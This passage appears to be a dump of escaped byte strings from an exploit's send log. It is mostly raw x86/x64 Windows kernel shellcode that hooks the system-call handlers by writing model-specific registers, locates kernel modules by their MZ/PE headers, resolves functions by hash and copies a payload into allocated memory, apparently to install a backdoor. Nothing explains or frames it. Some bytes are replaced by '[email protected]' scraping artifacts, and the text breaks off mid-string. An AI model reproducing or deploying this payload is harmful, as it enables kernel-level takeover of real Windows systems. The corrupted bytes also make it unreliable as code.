\\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 4, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\